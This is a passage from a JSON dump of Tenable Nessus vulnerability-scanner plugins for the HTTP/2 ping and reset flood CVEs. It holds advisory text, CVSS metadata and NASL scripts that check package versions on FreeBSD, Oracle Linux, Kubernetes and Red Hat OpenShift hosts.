script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"traefik<1.7.14\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:27:03", "description": "From Red Hat Security Advisory 2019:2726 :\n\nAn update for the go-toolset:rhel8 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGo Toolset provides the Go programming language tools and libraries.\nGo is alternatively known as golang.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* Failure trying to conntect to image registry using TLS when buildah is compiled with FIPS mode (BZ#1743169)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-09-19T00:00:00", "type": "nessus", "title": "Oracle Linux 8 : go-toolset:ol8 (ELSA-2019-2726) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:go-toolset", "p-cpe:/a:oracle:linux:golang", "p-cpe:/a:oracle:linux:golang-bin", "p-cpe:/a:oracle:linux:golang-docs", "p-cpe:/a:oracle:linux:golang-misc", "p-cpe:/a:oracle:linux:golang-race", "p-cpe:/a:oracle:linux:golang-src", "p-cpe:/a:oracle:linux:golang-tests", "cpe:/o:oracle:linux:8"], "id": "ORACLELINUX_ELSA-2019-2726.NASL", "href": "https://www.tenable.com/plugins/nessus/129036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2019:2726 and \n# Oracle Linux Security Advisory ELSA-2019-2726 respectively.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(129036);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:2726\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Oracle Linux 8 : go-toolset:ol8 (ELSA-2019-2726) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2019:2726 :\n\nAn update for the go-toolset:rhel8 module is now available for Red Hat\nEnterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGo Toolset provides the Go programming language tools and libraries.\nGo is alternatively known as golang.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* Failure trying to conntect to image registry using TLS when buildah\nis compiled with FIPS mode (BZ#1743169)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2019-September/009174.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected go-toolset:ol8 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/09/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:go-toolset\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:golang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:golang-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:golang-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:golang-misc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:golang-race\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:golang-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:golang-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:8\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 8\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"go-toolset-1.11.13-1.module+el8.0.1+5334+cadcb96c\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"golang-1.11.13-2.module+el8.0.1+5334+cadcb96c\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"golang-bin-1.11.13-2.module+el8.0.1+5334+cadcb96c\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"golang-docs-1.11.13-2.module+el8.0.1+5334+cadcb96c\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"golang-misc-1.11.13-2.module+el8.0.1+5334+cadcb96c\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"golang-race-1.11.13-2.module+el8.0.1+5334+cadcb96c\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"golang-src-1.11.13-2.module+el8.0.1+5334+cadcb96c\")) flag++;\nif (rpm_check(release:\"EL8\", cpu:\"x86_64\", reference:\"golang-tests-1.11.13-2.module+el8.0.1+5334+cadcb96c\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"go-toolset / golang / golang-bin / golang-docs / golang-misc / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:08:17", "description": "The version of Kubernetes installed on the remote host is a version prior to 1.13.10, or 1.14.x prior to 1.14.6, or 1.15.x prior to 1.15.3. It is, therefore, affected by the following denial of service vulnerabilities :\n\n - A denial of service (DoS) vulnerability exists in HTTP/2 due to some HTTP/2 implementations inefficiently handling a large queue of ping responses. An unauthenticated, remote attacker can exploit this issue, via continual ping requests, to cause the system to stop responding. (CVE-2019-9512) \n - A denial of service (DoS) vulnerability exists in HTTP/2 due to some HTTP/2 implementations inefficiently handling a queue of RST_STREAM frames. An unauthenticated, remote attacker can exploit this issue, by opening a number of streams and sending an invalid request over each stream, to cause the system to stop responding. (CVE-2019-9514)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-03-31T00:00:00", "type": "nessus", "title": "Kubernetes 1.13.x < 1.13.10 / 1.14.x < 1.14.6 / 1.15.x < 1.15.3 DoS", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:kubernetes:kubernetes", "cpe:/a:google:kubernetes"], "id": "KUBERNETES_1_15_3.NASL", "href": "https://www.tenable.com/plugins/nessus/135030", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135030);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"Kubernetes 1.13.x < 1.13.10 / 1.14.x < 1.14.6 / 1.15.x < 1.15.3 DoS\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains an application affected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Kubernetes installed on the remote host is a version prior to 1.13.10, or 1.14.x prior to 1.14.6, or\n1.15.x prior to 1.15.3. It is, therefore, affected by the following denial of service vulnerabilities :\n\n - A denial of service (DoS) vulnerability exists in HTTP/2 due to some HTTP/2 implementations inefficiently\n handling a large queue of ping responses. An unauthenticated, remote attacker can exploit this issue, via\n continual ping requests, to cause the system to stop responding. (CVE-2019-9512)\n \n - A denial of service (DoS) vulnerability exists in HTTP/2 due to some HTTP/2 implementations inefficiently\n handling a queue of RST_STREAM frames. An unauthenticated, remote attacker can exploit this issue, by\n opening a number of streams and sending an invalid request over each stream, to cause the system to stop\n responding. (CVE-2019-9514)\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's\nself-reported version number.\");\n # https://groups.google.com/forum/#!topic/kubernetes-security-announce/wlHLHit1BqA\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8a25528\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Kubernetes 1.13.10, 1.14.6, 1.15.3 or later, please refer to the vendor advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9512\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:kubernetes:kubernetes\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:kubernetes\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"kube_detect.nbin\");\n script_require_keys(\"installed_sw/Kubernetes\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_name = 'Kubernetes';\napp_info = vcf::get_app_info(app:app_name);\n\nvcf::check_all_backporting(app_info:app_info);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '1.13.0', 'fixed_version' : '1.13.10' },\n { 'min_version' : '1.14.0', 'fixed_version' : '1.14.6' },\n { 'min_version' : '1.15.0', 'fixed_version' : '1.15.3' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:29:33", "description": "An update is now available for Red Hat OpenShift Container Platform 4.1.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nThis advisory contains the ansible-operator, apb, containernetworking-plugins, golang-github-openshift-prometheus-alert-buffer, golang-github-prometheus-promu and openshift-eventrouter RPM packages for Red Hat OpenShift Container Platform 4.1.21. These packages have been rebuilt with an updated version of Go to address the below security issues.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth (CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory growth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-10-31T00:00:00", "type": "nessus", "title": "RHEL 7 : OpenShift Container Platform 4.1 (RHSA-2019:3265) (Ping Flood) (Reset Flood)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9512", "CVE-2019-9514"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:ansible-operator", "p-cpe:/a:redhat:enterprise_linux:ansible-operator-container-scripts", "p-cpe:/a:redhat:enterprise_linux:ansible-operator-devel", "p-cpe:/a:redhat:enterprise_linux:apb", "p-cpe:/a:redhat:enterprise_linux:apb-container-scripts", "p-cpe:/a:redhat:enterprise_linux:apb-devel", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins", "p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debuginfo", "p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-prometheus-alert-buffer", "p-cpe:/a:redhat:enterprise_linux:golang-github-prometheus-promu", "p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter", "p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter-debuginfo", "p-cpe:/a:redhat:enterprise_linux:prometheus-promu", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2019-3265.NASL", "href": "https://www.tenable.com/plugins/nessus/130418", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:3265. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130418);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-9512\", \"CVE-2019-9514\");\n script_xref(name:\"RHSA\", value:\"2019:3265\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0643\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 4.1 (RHSA-2019:3265) (Ping Flood) (Reset Flood)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update is now available for Red Hat OpenShift Container Platform\n4.1.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nThis advisory contains the ansible-operator, apb,\ncontainernetworking-plugins,\ngolang-github-openshift-prometheus-alert-buffer,\ngolang-github-prometheus-promu and openshift-eventrouter RPM packages\nfor Red Hat OpenShift Container Platform 4.1.21. These packages have\nbeen rebuilt with an updated version of Go to address the below\nsecurity issues.\n\nSecurity Fix(es) :\n\n* HTTP/2: flood using PING frames results in unbounded memory growth\n(CVE-2019-9512)\n\n* HTTP/2: flood using HEADERS frames results in unbounded memory\ngrowth (CVE-2019-9514)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3265\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9512\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2019-9514\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/08/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansible-operator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansible-operator-container-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ansible-operator-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apb-container-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:containernetworking-plugins-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-github-openshift-prometheus-alert-buffer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:golang-github-prometheus-promu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-eventrouter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:prometheus-promu\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:3265\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"ansible-operator-0.0.1-3.git.59.4beb3d2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ansible-operator-container-scripts-0.0.1-3.git.59.4beb3d2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"ansible-operator-devel-0.0.1-3.git.59.4beb3d2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"apb-2.0.3-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"apb-container-scripts-2.0.3-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"apb-devel-2.0.3-2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"containernetworking-plugins-0.8.1-4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"containernetworking-plugins-debuginfo-0.8.1-4.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"golang-github-openshift-prometheus-alert-buffer-0-3.gitceca8c1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"golang-github-prometheus-promu-0-5.git85ceabc.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-eventrouter-0.2-3.gited73fb6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"openshift-eventrouter-debuginfo-0.2-3.gited73fb6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"prometheus-promu-0-5.git85ceabc.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ansible-operator / ansible-operator-container-scripts / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-11T15:25:55", "description": "An update for the openshift and atomic-enterprise-service-catalog packages is now available for Red Hat OpenShift Container Platform 4.1.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE 